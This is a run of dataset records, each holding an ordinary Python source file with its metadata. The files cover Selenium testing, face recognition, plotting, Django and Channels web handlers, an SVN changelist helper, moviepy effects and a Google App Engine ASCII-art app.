self.naviObj.click_dataFill_overall_fill_hotel_monthFill()\n time.sleep(2)\n # 判断填报是否已填写,若未全部填写则填写未填写部分,若全都被填写则填写上一年\n for i in range(50):\n now = datetime.datetime.now()\n year = datetime.datetime.strftime(now, \"%Y\")\n self.mdObj.js_execute(self.mdObj.js)\n self.mdObj.input_yValue(int(year) - i * 1)\n self.mdObj.click_search()\n time.sleep(1)\n if self.mdObj.isClickable(self.mdObj.saveButton):\n for e in self.mdObj.eList:\n if self.mdObj.getAttribute(e, 'readonly') == 'true':\n self.mdObj.getLogger.info(\"{},已被填写\".format(e))\n else:\n self.mdObj.type(1, e)\n self.mdObj.getLogger(\"{},正在填写\".format(e))\n self.mdObj.click_saveButton()\n self.mdObj.click_submitButton()\n break\n else:\n continue\n\n def tearDown(self):\n self.d.close()\n","sub_path":"AutoFramework/testcase/test_dataFill_overall_hotel_monthFill_01_Fill.py","file_name":"test_dataFill_overall_hotel_monthFill_01_Fill.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"353092961","text":"import cv2\r\nimport face_recognition\r\n\r\nfrom infer import get_model, inference\r\n\r\ninference_args = get_model('face_vector')\r\nnew_inference_args = get_model()\r\n\r\n\r\ndef crop_face(img, location):\r\n top, right, bottom, left = location\r\n img = img[top:bottom, left:right]\r\n\r\n cv2.imwrite(f'capture/detect_face.jpg', img)\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n return img\r\n\r\n\r\nframe_rate = 30\r\nflip = 0\r\nwidth = 1080\r\nheight = 1080\r\nadjust = 100\r\n\r\nfourcc = cv2.VideoWriter_fourcc(*'DIVX')\r\nout_video = cv2.VideoWriter('capture/out.avi', fourcc, frame_rate, (width, height))\r\n\r\nvideo_file = 'videos/sanhak.mp4'\r\n\r\ncap = cv2.VideoCapture(video_file, cv2.IMREAD_GRAYSCALE)\r\ni = 0\r\nif cap.isOpened():\r\n while True:\r\n ret, img = cap.read()\r\n print('.',end='')\r\n if i > 240:\r\n inference_args = new_inference_args\r\n if ret:\r\n location = face_recognition.face_locations(img, model='hog') # top, right, bottom, left\r\n if len(location) != 0:\r\n location = location[0]\r\n\r\n face_image = crop_face(img, location)\r\n best_prob, idx, ans = inference(face_image, *inference_args)\r\n\r\n cv2.rectangle(img, (location[3], location[0]), (location[1], location[2]), (0, 0, 255), 2)\r\n if ans != \"\":\r\n cv2.putText(img, f'{ans}', (location[3], location[2] + 25), cv2.FONT_HERSHEY_SIMPLEX, 1,\r\n (0, 0, 255), 2)\r\n cv2.imwrite(f'capture/{i}.jpg', img)\r\n\r\n out_video.write(img)\r\n i += 1\r\n else:\r\n break\r\n\r\n\r\nelse:\r\n print(\"Can't open file\")\r\n\r\nout_video.release()\r\ncap.release()\r\n","sub_path":"video_infer.py","file_name":"video_infer.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"418142418","text":"#!/usr/local/bin/env python3\n\"\"\"\nThis program is designed to take in a \"clean\" csv file containing categorical\nor continuous data and create a graph for each pair of variables. These graphs\nwill then be displayed in an in a web browser window for convenient viewing.\n\nThis code is written using python3.5.1 and the following libraries:\ncycler (0.10.0)\nmatplotlib (1.5.1)\nnumpy (1.10.4)\npandas (0.17.1)\npip (8.0.2)\npyparsing (2.1.0)\npython-dateutil (2.4.2)\npytz (2015.7)\nscipy (0.17.0)\nseaborn (0.7.0)\nsetuptools (18.2)\nsix (1.10.0)\n\"\"\"\n\n# Import necicary libraries\nimport pandas as pd\nimport itertools as it\nimport seaborn as sns\nfrom matplotlib.pyplot import savefig\nimport os\n\ndef jplot(v0, v1, df, file_path):\n g = sns.jointplot(x=v0, y=v1, data = df)\n graph_name = file_path + v0 + \"_vs_\" + v1 + \".png\"\n g.savefig(graph_name)\n\ndef bplot(v0, v1, df, file_path):\n g = sns.boxplot(x=v0, y=v1, data=df)\n h = g.get_figure()\n graph_name = file_path + v0 + \"_vs_\" + v1 + \".png\"\n h.savefig(graph_name)\n\ndef cplot (v0, v1, df, file_path):\n g = sns.countplot(x=v0, hue=v1, data=df)\n h = g.get_figure()\n graph_name = file_path + v0 + \"_vs_\" + v1 + \".png\"\n h.savefig(graph_name)\n\ndef AutoGraph():\n\n # Prompt user for input file\n data = input(\"Please input the file you would like to analyse: \")\n\n file_path = input(\"Please enter the file path to save the output files: \")\n\n while os.path.exists(file_path) != True:\n print(\"There was a problem wit the file path.\")\n print(file_path)\n file_path = input(\"Please re-enter the file path: \")\n\n if file_path[-1] != \"/\":\n file_path += \"/\"\n else:\n pass\n\n # Read the input file into a pandas data frame\n df = pd.read_csv(data)\n\n # Create a list of all the combinations of collumns in the data frame.\n collumns = list(df.columns.values)\n p = it.permutations(collumns, 2)\n # Itterate through the list of combinations.\n for e in p:\n # Test variable type\n v0_len = len(df[e[0]].unique())\n v1_len = len(df[e[1]].unique())\n if v0_len > 100 and v1_len > 100:\n # Greate graph based on variable type.\n jplot(e[0], e[1], df, file_path)\n # Save the graph.\n elif v0_len <= 100 and v1_len > 100:\n bplot(e[0], e[1], df, file_path)\n elif v0_len > 100 and v1_len <= 100:\n bplot(e[1], e[0], df, file_path)\n else:\n cplot(e[0], e[1], df, file_path)\n #save the graph\n\n# graph_name = file_path + e[0] + \"_vs_\" + e[1] + \".png\"\n# savefig(graph_name)\n # Display all of the graphs\n\nAutoGraph()\n","sub_path":"AutoGraph.py","file_name":"AutoGraph.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"283105596","text":"# Program 7a\n'''\nA prime no. is a natural no. that has exactly two distinct natural no. divisors:\n1 and itself.\nA happy no. is a no. that leads to 1 after a sequence of steps where in each\nstep the no. is replaced by sum of squares of its digits.\n'''\ntry :\n file1 = open(\"prime.txt\",\"r\")\n file2 = open(\"happy.txt\",\"r\")\n prime_str = file1.read()\n happy_str = file2.read()\n prime = prime_str.split(\", \")\n happy = happy_str.split(\", \")\n lst3 = [int(val) for val in prime if val in happy] #using list comprehension\n print(\"Overlapping numbers :\")\n print(lst3)\n file1.close()\n file2.close()\nexcept IOError :\n print(\"Files not found\")\n#end of program\n\n'''OUTPUT :\nOverlapping numbers :\n[7, 13, 19, 23, 31, 79, 97, 103, 109, 139, 167, 193, 239, 263, 293,\n313, 331, 367, 379, 383, 397, 409, 487,563, 617, 653, 673, 683, 709,\n739, 761, 863, 881, 907, 937]\n'''\n","sub_path":"skn_7a.py","file_name":"skn_7a.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"241091464","text":"from rest_framework import generics, status\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.response import Response\nfrom api.messages import SUCCESS, STATE, ERROR, EXCEPTION, RESULTS\nfrom rest_framework.exceptions import APIException\nfrom v1.commonapp.views.custom_exception import InvalidTokenException, InvalidAuthorizationException\nfrom v1.commonapp.views.pagination import StandardResultsSetPagination\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom rest_framework.filters import OrderingFilter, SearchFilter\nfrom v1.registration.models.registration_subtype import RegistrationSubType as RegistrationSubTypeModel,get_registration_subtype_by_id_string\nfrom v1.registration.serializers.registration_subtype import RegistrationSubTypeListSerializer,RegistrationSubTypeSerializer,RegistrationSubTypeViewSerializer\nfrom v1.commonapp.views.logger import logger\nfrom v1.commonapp.common_functions import is_token_valid, get_payload, is_authorized\nfrom rest_framework.response import Response\nfrom v1.userapp.decorators import is_token_validate, role_required\nfrom v1.utility.models.utility_master import get_utility_by_id_string\nfrom v1.commonapp.common_functions import is_authorized, is_token_valid, get_user_from_token\nfrom v1.commonapp.views.custom_exception import InvalidAuthorizationException, InvalidTokenException, CustomAPIException\nfrom v1.commonapp.views.logger import logger\nfrom master.models import get_user_by_id_string\nfrom api.messages import *\nfrom api.constants import *\n\n# API Header\n# API end Point: api/v1/registration/utility/:id_string/subtype/list\n# API verb: GET\n# Package: Basic\n# Modules: Admin\n# Sub Module: Admin\n# Interaction: Registration SubType list\n# Usage: API will fetch all Registration Subtype list\n# Tables used: Registration SubType\n# Author: Chinmay\n# Created on: 30/11/2020\n\nclass RegistrationSubTypeList(generics.ListAPIView):\n try:\n serializer_class = RegistrationSubTypeListSerializer\n pagination_class = StandardResultsSetPagination\n\n filter_backends = (DjangoFilterBackend, OrderingFilter, SearchFilter)\n filter_fields = ('name', 'tenant__id_string',)\n ordering_fields = ('name', 'tenant',)\n ordering = ('name',) # always give by default alphabetical order\n search_fields = ('name', 'tenant__name',)\n\n def get_queryset(self):\n response, user_obj = is_token_valid(self.request.headers['Authorization'])\n if response:\n if is_authorized(1, 1, 1, user_obj):\n utility = get_utility_by_id_string(self.kwargs['id_string'])\n queryset = RegistrationSubTypeModel.objects.filter(utility=utility, is_active=True)\n if queryset:\n return queryset\n else:\n raise CustomAPIException(\"Registration Sub Type not found.\", status.HTTP_404_NOT_FOUND)\n else:\n raise InvalidAuthorizationException\n else:\n raise InvalidTokenException\n except Exception as e:\n logger().log(e, 'MEDIUM', module='Admin', sub_module='Utility')\n\n# API Header\n# API end Point: api/v1/registration/subtype\n# API verb: POST\n# Package: Basic\n# Modules: Admin\n# Sub Module: Admin\n# Interaction: Registration post\n# Usage: API will Post the Registartion SubType\n# Tables used: Registration SubType\n# Author: Chinmay\n# Created on: 30/11/2020\nclass RegistrationSubType(GenericAPIView):\n\n @is_token_validate\n #role_required(ADMIN, UTILITY_MASTER, EDIT)\n def post(self, request):\n try:\n user_id_string = get_user_from_token(request.headers['Authorization'])\n user = get_user_by_id_string(user_id_string)\n serializer = RegistrationSubTypeSerializer(data=request.data)\n if serializer.is_valid(raise_exception=False):\n registration_subtype_obj = serializer.create(serializer.validated_data, user)\n view_serializer = RegistrationSubTypeViewSerializer(instance=registration_subtype_obj, context={'request': request})\n return Response({\n STATE: SUCCESS,\n RESULTS: view_serializer.data,\n }, status=status.HTTP_201_CREATED)\n else:\n return Response({\n STATE: ERROR,\n RESULTS: list(serializer.errors.values())[0][0],\n }, status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n logger().log(e, 'HIGH', module='Admin', sub_module='Utility')\n res = self.handle_exception(e)\n return Response({\n STATE: EXCEPTION,\n RESULTS: str(e),\n }, status=res.status_code)\n\n\n# API Header\n# API end Point: api/v1/registration/subtype/:id_string\n# API verb: GET,PUT\n# Package: Basic\n# Modules: Admin\n# Sub Module: Admin\n# Interaction: Registration Type corresponding to the id\n# Usage: API will fetch and update Registration SubTypes for a given id\n# Tables used: Registration SubTypes\n# Author: Chinmay\n# Created on: 30/11/2020\n\n\nclass RegistrationSubTypeDetail(GenericAPIView):\n\n @is_token_validate\n #role_required(ADMIN, UTILITY_MASTER, EDIT)\n def get(self, request, id_string):\n try:\n registration_subtype = get_registration_subtype_by_id_string(id_string)\n if registration_subtype:\n serializer = RegistrationSubTypeViewSerializer(instance=registration_subtype, context={'request': request})\n return Response({\n STATE: SUCCESS,\n RESULTS: serializer.data,\n }, status=status.HTTP_200_OK)\n else:\n return Response({\n STATE: ERROR,\n }, status=status.HTTP_404_NOT_FOUND)\n except Exception as e:\n logger().log(e, 'MEDIUM', module='Admin', sub_module='Utility')\n res = self.handle_exception(e)\n return Response({\n STATE: EXCEPTION,\n RESULTS: str(e),\n }, status=res.status_code)\n\n @is_token_validate\n #role_required(ADMIN, UTILITY_MASTER, EDIT)\n def put(self, request, id_string):\n try:\n user_id_string = get_user_from_token(request.headers['Authorization'])\n user = get_user_by_id_string(user_id_string)\n registration_subtype_obj = get_registration_subtype_by_id_string(id_string)\n if \"name\" not in request.data:\n request.data['name'] = registration_subtype_obj.name\n if registration_subtype_obj:\n serializer = RegistrationSubTypeSerializer(data=request.data)\n if serializer.is_valid(raise_exception=False):\n registration_subtype_obj = serializer.update(registration_subtype_obj, serializer.validated_data, user)\n view_serializer = RegistrationSubTypeViewSerializer(instance=registration_subtype_obj,\n context={'request': request})\n return Response({\n STATE: SUCCESS,\n RESULTS: view_serializer.data,\n }, status=status.HTTP_200_OK)\n else:\n return Response({\n STATE: ERROR,\n RESULTS: list(serializer.errors.values())[0][0],\n }, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({\n STATE: ERROR,\n }, status=status.HTTP_404_NOT_FOUND)\n except Exception as e:\n logger().log(e, 'HIGH', module='Admin', sub_module='Utility')\n res = self.handle_exception(e)\n return Response({\n STATE: EXCEPTION,\n RESULTS: str(e),\n }, status=res.status_code)\n \n","sub_path":"api/v1/registration/views/registration_subtype.py","file_name":"registration_subtype.py","file_ext":"py","file_size_in_byte":7959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"333170641","text":"from channels import Channel, Group\nfrom channels.sessions import channel_session\nfrom channels.auth import channel_session_user, channel_session_user_from_http\nfrom findafriend.models import Page, Chat\nfrom django.contrib.auth.models import User\nimport json\n\n\n@channel_session_user_from_http\ndef ws_con(msg):\n # accept the socket \n msg.reply_channel.send({\n \"accept\": True\n })\n\n # add to the chat group\n Group(\"chat\").add(msg.reply_channel); \n\n# Connected to websocket.receive\n@channel_session_user\ndef ws_msg(msg):\n data = json.loads(msg.content['text'])\n\n # history calling from request\n if(data['isRequest'] == 'True'):\n if(Chat.objects.filter(recipient__in=Page.objects.filter(title=data['recipient'])))is not None:\n # query histroy\n for c in Chat.objects.filter(recipient__in=Page.objects.filter(title=data['recipient'])).order_by('timestamp'):\n chatJSON = {}\n chatJSON[\"sender\"] = c.sender.username\n chatJSON[\"recipient\"] = c.recipient.title\n chatJSON[\"message\"] = c.messageContent\n chatJSON[\"timestamp\"] = c.timestamp.isoformat(' ')\n # send histroy to user\n msg.reply_channel.send({\"text\":json.dumps(chatJSON)})\n else: \n # save to database\n c = Chat(sender=User.objects.get(username=data['sender']), recipient=Page.objects.get(title = data['recipient']), messageContent=data['message'])\n c.save()\n \n # send message to the group\n Group(\"chat\").send({\n \"text\": json.dumps(data) \n })\n\n@channel_session_user\ndef ws_discon(msg):\n Group(\"chat\").discard(msg.reply_channel)\n","sub_path":"tacos/tacos/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"510190274","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as pl\nimport os\nimport kawa.myplot as my\nimport kawa.daq as dq\nmy.defalt(bold = True)\n#import seaborn\nhome = os.environ[\"HOME\"]\nos.chdir(home + \"/KYTHON/paper\")\n\nNe_All = pd.read_csv(\"Ne_list_All.csv\") #Fluctuation component\nNe_flc = pd.read_csv(\"Ne_list.csv\")\nd_phi = pd.read_csv(\"dp_list.csv\")\nVn = pd.read_csv(\"Vn_list.csv\")\nIn = pd.read_csv(\"In_list.csv\")\ntau = np.load(\"tau.npy\")\nprint(Ne_flc.shape,d_phi.shape,Vn.shape,In.shape)\nprint(tau[1]-tau[0])\n\nc = 4.0\n\nk = 100 # k = m/r\nfreq = 9e3\ndelta = 2*np.pi*freq / k * 1e-6\nB0 = 0.13 #[T]\nprint(\"δ = {}\".format(delta))\nv_ExB = d_phi / delta /B0\nr_list = np.arange(2,7,0.5)\nflux = v_ExB*Ne_flc #/1e21\n\nmx = len(tau)\nfor i in[3.0,3.5]:\n grad_n = ( Ne_All.loc[:mx,str(i+0.5)] - Ne_All.loc[:mx,str(i-0.5)] )/0.01 #/1e20\n pl.plot(tau[:mx+1],grad_n,label = \"{}cm\".format(i))\npl.xlabel(\"tau (ms)\")\npl.ylabel(r\"$\\partial_r \\mathrm{n}$ ($\\mathrm{m^{-2}sec^{-1}}$)\")\npl.xlim(tau.min(),tau.max())\npl.legend()\npl.show()\n #pl.plot(-grad_n,flux.loc[:mx,str(i)],label = \"r = {} cm\".format(i))\n# fig,ax1 = pl.subplots()\n# ax2 = ax1.twinx()\n# ax1.plot(grad_n,color = \"red\")\n# ax2.plot(flux.loc[:mx,\"3.0\"])\npl.show()\n\n# # pl.scatter(grad_n[0],flux.loc[0,str(i)],color = \"k\")\n# # pl.scatter(grad_n[mx],flux.loc[mx,str(i)],color = \"r\")\n# pl.axhline(0,linestyle = \"--\",color = \"k\",linewidth = 1)\n# pl.axvline(0,linestyle = \"--\",color = \"k\",linewidth = 1)\n# pl.legend(fontsize = 12)\n# # pl.xlim(-3.3e18,2e18)\n# # pl.ylim(-2.1e21,1e21)\n# pl.yticks([-2,-1,0,1])\n# pl.grid(color='gray',alpha = 0.5)\n# # pl.ylabel(r\"$\\Gamma_r \\mathrm{(10^{21}/m^2s^1)}$\")\n# # pl.xlabel(r\"$\\partial_r \\mathrm{n_{e}} \\mathrm{(10^{20}/m^4)}$\")\n# # pl.tight_layout\n# pl.show()\n# # c = 1\n\n\n# refpath = home + \"/KYTHON/ref/\"\n# datapath = home + \"/data/\"\n# fid = dq.pantaADC()\n# dag5 = pd.read_csv(refpath + \"5ch.dag\",dtype = str,comment = \"#\")\n# dag64 = pd.read_csv(refpath + \"64ch.dag\",dtype = str,comment = \"#\")\n\n\n\n# shotno = \"105396\"\n# sub = \"011\"\n# profile = np.zeros(10)\n# c = 1\n# for i in [4,3,2,1,0]:\n# Iis, time = fid.read(shot = shotno, subshot = sub ,\n# tower = dag5.loc[i, \"tower\" ].strip(),\n# station = dag5.loc[i, \"station\"].strip(),\n# ch = dag5.loc[i, \"ch\" ].strip(),\n# dir = datapath, samplingtime = True,\n# start = 240000, end = 540000)\n# Iis /= 20\n# ne = np.mean( Iis )\n# profile[2*(c-1)] = ne\n# print(2*(c-1))\n# c += 1\n# shotno = \"105398\"\n# sub = \"011\"\n# c = 1\n# for i in [4,3,2,1,0]:\n# Iis, time = fid.read(shot = shotno, subshot = sub ,\n# tower = dag5.loc[i, \"tower\" ].strip(),\n# station = dag5.loc[i, \"station\"].strip(),\n# ch = dag5.loc[i, \"ch\" ].strip(),\n# dir = datapath, samplingtime = True,\n# start = 240000, end = 540000)\n# Iis /= 20\n# ne = np.mean( Iis )\n# profile[2*(c-1)+1] = ne\n# c += 1\n# print(2*(c-1)+1)\n\n# import scipy.constants as sc\n# mi = sc.proton_mass * 40 #Ar\n# e = sc.e\n# k = sc.k\n# pi = sc.pi\n# r = 4.0e-4\n# S = pi*r**2 + 2 * pi * r * 3.5e-3\n# Te_profile = np.array([2.5, 2.4, 2.0, 1.7, 1.2, 0.9, 0.8, 0.75, 0.7, 0.7] )\n# Cs = (Te_profile*e/mi)**(1/2)\n# coef = np.exp(1/2)/S/e/Cs\n\n\n# r = np.arange(2,7,0.5)\n# pl.plot(r,coef*profile)\n# pl.show()\n# print(profile)\n\n# dt = 1e-6\n# edge1 = int(0.24 / dt)\n# edge2 = int(0.54 / dt)\n# #=============================================\n# # 105396_011 Iis r = 2.0-6.0\n# #=============================================\n# #reference 64 ==> ch1 Iis\n# sub = \"011\"\n# shotno = \"105396\"\n# grad_n = ( df_I[4.0] - df_I[3.0] ) / 0.01\n# # pl.scatter(r_list,np.mean(v_ExB*Ne),color = \"b\")\n# # pl.hlines(0,2,6.5)\n# # pl.ylim(-6e20,6e20)\n# # pl.show()","sub_path":"paper/Flux_relation.py","file_name":"Flux_relation.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"575981983","text":"from datetime import datetime\nimport requests\n\nfrom pytz import timezone\n\n\ndef _main():\n midnighters = get_midnighters(load_attempts())\n for midnighter in sorted(midnighters):\n print(midnighter)\n\n\ndef load_attempts():\n page_num = 1\n while True:\n attempts_page = fetch_attempts_page(page_num)\n for record in attempts_page['records']:\n yield {\n 'username': record['username'],\n 'timestamp': record['timestamp'],\n 'timezone': record['timezone'],\n }\n if page_num == attempts_page['number_of_pages']:\n break\n else:\n page_num += 1\n\n\ndef fetch_attempts_page(page):\n return requests.get(\n 'https://devman.org/api/challenges/solution_attempts/',\n params={'page': page}\n ).json()\n\n\ndef get_midnighters(attempts):\n midnighters = set()\n midnight = 0\n working_hours_start = 6\n\n for attempt in attempts:\n attempt_dt = datetime.fromtimestamp(\n attempt['timestamp'],\n timezone(attempt['timezone'])\n )\n if midnight < attempt_dt.hour < working_hours_start:\n midnighters.add(attempt['username'])\n\n return list(midnighters)\n\n\nif __name__ == '__main__':\n _main()\n","sub_path":"seek_dev_nighters.py","file_name":"seek_dev_nighters.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"387305657","text":"import unittest\n\nfrom training.board_drawer import display_board\n\n\nclass TestTTTBoardDrawer(unittest.TestCase):\n\n def test_display_board(self):\n\n board = [1, 0, 0, -1, -1, 1, 0, 0, -1]\n\n print(display_board(board))\n\n board = [0, 0, 1, -1, -1, 0, 0, 0, -1]\n\n print(display_board(board))\n","sub_path":"tests/test_board_drawer.py","file_name":"test_board_drawer.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"306914339","text":"from moviepy.editor import *\nimport providad\nimport providad.asset\nimport numpy as np\nfrom moviepy import editor\n\nclass LetterBase:\n def moveLetters(self, letters):\n return [ letter[0].set_pos(self.move(letter[1],i,len(letters))) for i,letter in enumerate(letters)]\n\n def move(self, screenpos,i,nletters):\n pass\n\nclass LetterMove(LetterBase):\n def __init__(self, duration, percentageFromLeft=20, percentageFromTop=50, fontSize=60, txtcolor='red', bgcolor='transparent', font='Amiri-Bold'):\n self.duration = duration\n self.fontSize = fontSize\n self.txtcolor= txtcolor\n self.bgcolor= bgcolor\n self.font= font\n self.top= percentageFromTop\n self.left= percentageFromLeft\n\n def apply(self, clip, startTime, asset):\n w,h = clip.size\n screensize = clip.size\n letters= []\n sumwidth=0\n for a in range(0, len(asset.value)):\n tmp = []\n tmp.append( TextClip(asset.value[a], color=self.txtcolor, bg_color=self.bgcolor, font=self.font, fontsize=self.fontSize) )\n tmp.append( (self.left * (w/100) + sumwidth , self.top * (h/100) ) )\n sumwidth += tmp[0].w +5\n letters.append(tmp)\n\n newVideos= CompositeVideoClip( (self.moveLetters(letters)), size = screensize)\n newVideos = newVideos.set_start(startTime).set_duration(self.duration)\n return editor.CompositeVideoClip([clip, newVideos])","sub_path":"src/providad/asset_effects_Letters_Base.py","file_name":"asset_effects_Letters_Base.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"558845372","text":"# coding: utf8\n\nimport subprocess\nimport re\nimport os\n\nclass Changelist:\n\n def __init__(self, merge_workspace):\n self.merge_workspace = merge_workspace\n\n @staticmethod\n def _executor(cmd):\n # cmd : string\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n out, err = p.communicate()\n return out, err\n\n def status(self):\n cmd = 'svn status %s'% self.merge_workspace\n out, err = Changelist._executor(cmd)\n return out, err\n\n def changelist_str2list(self):\n cls, err = self.status()\n if err:\n print('changelist error')\n return\n new_cls = []\n for cl in cls.split('\\n'):\n if cl == '':\n continue\n new_cl = cl.split(' ')[-1]\n new_cls.append(new_cl)\n return new_cls\n\n def make_changelist(self):\n new_lst = []\n ptn = r'(.*/deploys)/(.*.*)'\n conf = None\n for cl in self.changelist_str2list():\n m = re.search(ptn, cl)\n if m:\n if 'conf_checklist.txt' == m.group(2):\n conf = os.path.join(m.group(1), 'conf_checklist.txt')\n continue\n new_lst.append(cl)\n if conf:\n new_lst.append(conf)\n if len(new_lst) == 0:\n print('changelist is empty')\n return\n cl_out, cl_err = Changelist._executor('svn changelist cl %s'%(' '.join(new_lst)))\n print('cl_out', cl_out)\n print('cl_err', cl_err)\n return 'cl'\n\n def commit_changelist(self, msg):\n os.chdir(self.merge_workspace)\n c_msg, c_err = self._executor('svn commit --cl cl -m %s' % (msg))\n print('c_msg', c_msg)\n print('c_err', c_err)\n\n def find_del_deploy_item(self, merge_workspace):\n deploy_dir = os.path.join(merge_workspace, 'de')\n new_lst = []\n ptn = r'(.*/deploys)/(.*.*)'\n conf = None\n for cl in self.changelist_str2list():\n m = re.search(ptn, cl)\n if m:\n if 'conf_checklist.txt' == m.group(2):\n conf = os.path.join(m.group(1), 'conf_checklist.txt')\n continue\n new_lst.append(cl)\n if conf:\n new_lst.append(conf)\n if len(new_lst) == 0:\n print('changelist is empty')\n return\n cl_out, cl_err = Changelist._executor('svn changelist cl %s'%(' '.join(new_lst)))\n print('cl_out', cl_out)\n print('cl_err', cl_err)\n return 'cl'\n\nif __name__ == '__main__':\n ws = '/home/svn/temp/docker'\n cl = Changelist(ws)\n cls = cl.changelist_str2list()\n final_list = cl.make_changelist(cls)\n if 'cl' == final_list:\n print('commit changelist')\n cl.commit_changelist('commit_test')","sub_path":"han-test/changelist.py","file_name":"changelist.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"160216422","text":"#!/usr/bin/env python\n#\n# Copyright 2007 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport webapp2\nimport os\nimport jinja2\nfrom xml.dom import minidom\nimport urllib2\n\n#library to debugging\nimport logging\n\n# import database\nfrom google.appengine.ext import db\n\ntemplate_dir = os.path.join(os.path.dirname(__file__), 'templates')\njinja_env = jinja2.Environment(loader= jinja2.FileSystemLoader(template_dir), autoescape=True)\n\n\nIP_PAGE = \"http://ip-api.com/xml/\"\nGMAPS_URL = \"http://maps.googleapis.com/maps/api/staticmap?size=380x263&sensor=false\"\ndef get_coords(ip) :\n\t# test ip\n\tip = \"107.22.175.13\"\n\turl = IP_PAGE + ip\n\tcontent = None\n\n\ttry :\n\t\tcontent = urllib2.urlopen(url)\n\texcept :\n\t\tNone\n\n\tif content :\n\t\tparse_xml = minidom.parseString(content.read())\n\t\tlat = parse_xml.getElementsByTagName(\"lat\")[0].childNodes[0].nodeValue\n\t\tlon = parse_xml.getElementsByTagName(\"lon\")[0].childNodes[0].nodeValue\n\t\treturn db.GeoPt(lat, lon)\n\n# generating the image from url to send to google api\ndef gmaps_img(points):\n ###Your code here\n base_markers= \"&markers=\"\n markers_string = ''\n for p in points :\n \tmarkers_string += base_markers + str(p.lat) + \",\" + str(p.lon)\n\n url = GMAPS_URL + markers_string\n return url\n\n# hashing table for cache\nCACHE = {}\n# this get the most recent created arts\n# update is for always has the cache full and avoid cache stampede\ndef top_arts(update = false) :\n\t# this is the key of the query in the cache\n\tkey = \"top\"\n\tif not update or key in CACHE :\n\t\tarts = CACHE[key]\n\telse :\n\t\tlogging.error(\"DB QUERY\")\n\t\t# executing the query and saving the results in a variable\n\t\t# remember that in google data store we only can use select * from, all the properties\n\t\tarts = db.GqlQuery(\"SELECT * FROM Art ORDER BY created DESC\")\n\t\t# prevent the running of multiples queries\n\t\tarts = list(arts)\n\t\tCACHE[key] = arts\n\treturn arts\n\nclass Handler(webapp2.RequestHandler) :\n\n\tdef write(self, *a, **kw) :\n\n\t\tself.response.out.write(*a, **kw)\n\n\tdef render_str(self, template, **params) :\n\n\t\tt = jinja_env.get_template(template)\n\t\treturn t.render(params)\n\n\tdef render(self, template, **kw) :\n\n\t\tself.write(self.render_str(template, **kw))\n\n\n# in appengine databases are definen by classes and are entities\n\nclass Art(db.Model) :\n\n\t# defining properties with their respective fields\n\t\n\ttitle = db.StringProperty(required = True) # required is a constraint like not null in sql server\n\tart = db.TextProperty(required = True)\n\t# save the date automatically\n\tcreated = db.DateTimeProperty(auto_now_add = True) \n\tcoords = db.GeoPtProperty()\t\n\nclass MainHandler(Handler):\n\n\t# function to render the form\n\t# we can render with \n\tdef render_front(self, title=\"\", art=\"\", error=\"\") :\n\t\t# getting the top 10 arts\n\t\tarts = top_arts()\n\t\t# saving who was coordenates\n\t\tpoints = []\n\t\tfor a in arts :\n\t\t\tif a.coords :\n\t\t\t\tpoints.append(a.coords)\n\n\t\t# generating img url\n\t\timg_url = None\n\t\tif points :\n\t\t\timg_url = gmaps_img(points)\n\n\t\tself.render(\"index.html\", title = title, art = art, error = error, arts=arts, img_url=img_url)\n\n\t\n\tdef get(self):\n\t\tself.render_front()\n\t\n\tdef post(self) :\n\t\t#get values\n\t\ttitle = self.request.get(\"title\")\n\t\tart = self.request.get(\"art\")\n\t\tif title and art :\n\t\t\t# creating a new object of the entity\n\t\t\ta = Art(title=title, art=art)\n\t\t\t# getting ip\n\t\t\tmy_coords = self.request.remote_addr\n\t\t\ta.coords = get_coords(my_coords)\n\t\t\t# save it in the database\n\t\t\ta.put()\n\t\t\t# updating the cache only when writing\n\t\t\ttop_arts(True)\n\n\n\t\t\t# # clearing the catch for get it to its original state\n\t\t\t# do not do this for avoid cache stampide\n\t\t\t# CACHE.clear()\n\n\t\t\tlogging.error(CACHE)\n\t\t\tself.redirect(self.request.url)\n\t\telse :\n\t\t\terror = \"We need both, the title and the art work\"\n\t\t\tself.render_front(title, art, error)\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler)\n], debug=True)\n","sub_path":"Lessons/Lesson 6 - 